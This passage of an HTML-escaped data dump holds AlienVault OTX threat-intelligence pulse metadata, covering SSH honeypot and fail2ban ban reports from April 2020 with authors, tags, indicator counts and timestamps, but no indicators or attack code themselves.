;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5ea656bac02c4b4b0bed24bb',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;6,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{'FileHash-MD5':&nbsp;2,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'FileHash-SHA1':&nbsp;2,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'FileHash-SHA256':&nbsp;2},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-04-27T03:51:22.460000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'359&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'SSH&nbsp;honeypot&nbsp;logs&nbsp;for&nbsp;4/26/2020',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;1420,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['SSH',&nbsp;'bruteforce',&nbsp;'honeypot'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-04-25T23:05:02.817000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5ea4c21e99160aa286bf0488',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-04-25T23:05:02.817000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'360&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-04-25&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'6dc27fe2-df3f-4096-aee8-70b84449f012',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;150,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nb